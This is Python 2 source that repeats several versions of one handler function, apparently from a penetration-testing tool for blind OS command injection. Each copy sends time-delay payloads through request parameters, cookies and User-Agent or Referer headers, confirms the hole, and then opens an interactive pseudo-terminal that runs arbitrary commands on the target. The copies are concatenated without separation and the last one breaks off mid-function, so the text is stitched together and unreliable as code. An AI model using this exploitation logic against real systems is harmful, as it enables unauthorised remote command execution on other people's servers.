def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):
counter = 1
vp_flag = True
no_result = True
is_encoded = False
fixation = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
num_of_chars = 0
# Calculate all possible combinations
total = len(settings.SEPARATORS)
# Estimating the response time (in seconds)
request = urllib2.Request(url)
headers.do_check(request)
start = time.time()
response = urllib2.urlopen(request)
response.read(1)
response.close()
end = time.time()
diff = end - start
url_time_response = int(diff)
if url_time_response != 0 :
print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[url_time_response == 1:] + "." + Style.RESET_ALL
delay = int(delay) + int(url_time_response)
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
if not menu.options.verbose:
percent = ((num_of_chars*100)/total)
if how_long >= delay:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
if not menu.options.verbose:
percent = ((num_of_chars*100)/total)
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
break
else:
percent = str(percent)+"%"
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if how_long >= delay:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
# Cookie Injection
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print ""
except KeyboardInterrupt:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
if menu.options.verbose == False:
print ""
return False
else:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded = False
fixation = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in " + technique + "!" + Style.RESET_ALL
num_of_chars = 0
# Calculate all possible combinations
total = len(settings.SEPARATORS)
# Estimating the response time (in seconds)
request = urllib2.Request(url)
headers.do_check(request)
start = time.time()
response = urllib2.urlopen(request)
response.read(1)
response.close()
end = time.time()
diff = end - start
url_time_response = int(diff)
if url_time_response != 0:
print Style.BRIGHT + "(!) The estimated response time is " + str(url_time_response) + " second" + "s"[
url_time_response == 1 :
] + "." + Style.RESET_ALL
delay = int(delay) + int(url_time_response)
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Change TAG on every request to prevent false-positive resutls.
TAG = "".join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell:
payload = tfb_payloads.decision_alter_shell(
separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
)
else:
payload = tfb_payloads.decision(
separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method
)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Check if target host is vulnerable
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
if not menu.options.verbose:
percent = (num_of_chars * 100) / total
if how_long >= delay:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent) + "%"
else:
percent = str(percent) + "%"
sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
if not menu.options.verbose:
percent = (num_of_chars * 100) / total
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
break
else:
percent = str(percent) + "%"
raise
else:
percent = str(percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if how_long >= delay:
found = True
no_result = False
# Print the findings to log file.
if export_injection_info == False:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
export_injection_info = True
if http_request_method == "GET":
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" (" + str(counter) + ") Payload : " + re.sub("%20", " ", payload) + "\n")
output_file.close()
# Vulnerabe Parameter
GET_vuln_param = parameters.vuln_GET_param(url)
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + GET_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
"%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))
) + Style.RESET_ALL
else:
# Print the findings to log file
if vp_flag == True:
output_file = open(filename + ".txt", "a")
output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
output_file.write("\n")
vp_flag = False
output_file.close()
counter = counter + 1
output_file = open(filename + ".txt", "a")
output_file.write(" (" + str(counter) + ") Payload : " + re.sub("%20", " ", payload) + "\n")
output_file.close()
# Vulnerabe Parameter
POST_vuln_param = vuln_parameter
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The (" + http_request_method + ") '" + Style.UNDERLINE + POST_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to " + injection_type + "." + Style.RESET_ALL
print " (+) Type : " + Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : " + Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : " + Fore.YELLOW + Style.BRIGHT + re.sub(
"%20", " ", payload.replace("\n", "\\n")
) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(
separator,
maxlen,
TAG,
delay,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
)
# Check for any enumeration options.
tfb_file_access.do_check(
separator,
maxlen,
TAG,
delay,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(
separator,
maxlen,
TAG,
cmd,
delay,
http_request_method,
url,
vuln_parameter,
OUTPUT_TEXTFILE,
alter_shell,
)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0:
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in " + time.strftime(
"%H:%M:%S", time.gmtime(check_how_long)
) + ".\n"
else:
print ""
except KeyboardInterrupt:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the " + technique + "... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
if menu.options.verbose == False:
print ""
return False
else:
print ""
return False
else:
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
vp_flag = True
no_result = True
is_encoded = False
fixation = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
num_of_chars = 0
# Calculate all possible combinations
total = len(settings.SEPARATORS)
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
print Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
percent = ((num_of_chars * 100) / total)
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
if len(TAG) == output_length :
if fixation == True:
delay = delay + 1
else:
fixation = True
continue
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
output = tfb_injector.false_positive_check(separator, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
if str(output) == str(randvcalc):
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if ((url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay)) and len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
sys.exit(0)
else:
# The main command injection exploitation.
# Cookie Injection
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print ""
except KeyboardInterrupt:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
if menu.options.verbose == False:
print ""
return False
else:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
if separator == ";" or separator == "&&" or separator == "||":
print Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
percent = ((num_of_chars * 100) / total)
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
if str(output) == str(randvcalc):
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload.replace("\n", "\\n")) + Style.RESET_ALL
# Check for any enumeration options.
tfb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check for any enumeration options.
tfb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Check if defined single cmd.
if menu.options.os_cmd:
tfb_enumeration.single_os_cmd_exec(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd == "?":
menu.shell_options()
continue
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
check_how_long, output = tfb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
def tfb_injection_handler(url, delay, filename, tmp_path, http_request_method, url_time_response):
counter = 1
num_of_chars = 1
vp_flag = True
no_result = True
is_encoded = False
export_injection_info = False
injection_type = "Semiblind-based Command Injection"
technique = "tempfile-based injection technique"
# Check if defined "--maxlen" option.
if menu.options.maxlen:
maxlen = menu.options.maxlen
# Check if defined "--url-reload" option.
if menu.options.url_reload == True:
print Back.RED + "(x) Error: The '--url-reload' option is not available in "+ technique +"!" + Style.RESET_ALL
# Calculate all possible combinations
total = (len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES) - len(settings.JUNK_COMBINATION))
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
num_of_chars = num_of_chars + 1
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for num_of_chars in range(6))
# The output file for file-based injection technique.
OUTPUT_TEXTFILE = tmp_path + TAG + ".txt"
alter_shell = menu.options.alter_shell
tag_length = len(TAG) + 4
for output_length in range(1, int(tag_length)):
try:
# Tempfile-based decision payload (check if host is vulnerable).
if alter_shell :
payload = tfb_payloads.decision_alter_shell(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
else:
payload = tfb_payloads.decision(separator, output_length, TAG, OUTPUT_TEXTFILE, delay, http_request_method)
# Fix prefixes / suffixes
payload = parameters.prefixes(payload, prefix)
payload = parameters.suffixes(payload, suffix)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload.replace("\n", "\\n") + Style.RESET_ALL)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
# Check if target host is vulnerable to cookie injection.
vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
how_long = tfb_injector.cookie_injection_test(url, vuln_parameter, payload)
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
# Check if target host is vulnerable to user-agent injection.
vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
how_long = tfb_injector.user_agent_injection_test(url, vuln_parameter, payload)
# Referer Injection
elif settings.REFERER_INJECTION == True:
# Check if target host is vulnerable to referer injection.
vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
how_long = tfb_injector.referer_injection_test(url, vuln_parameter, payload)
else:
# Check if target host is vulnerable.
how_long, vuln_parameter = tfb_injector.injection_test(payload, http_request_method, url)
# Injection percentage calculation
percent = ((num_of_chars * 100) / total)
if percent == 100 and no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = ""
else:
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
# Time relative false positive fixation.
randv1 = random.randrange(0, 1)
randv2 = random.randrange(1, 2)
randvcalc = randv1 + randv2
cmd = "echo $((" + str(randv1) + "+" + str(randv2) + "))"
output = tfb_injector.false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell)
if str(output) == str(randvcalc):
if not menu.options.verbose:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
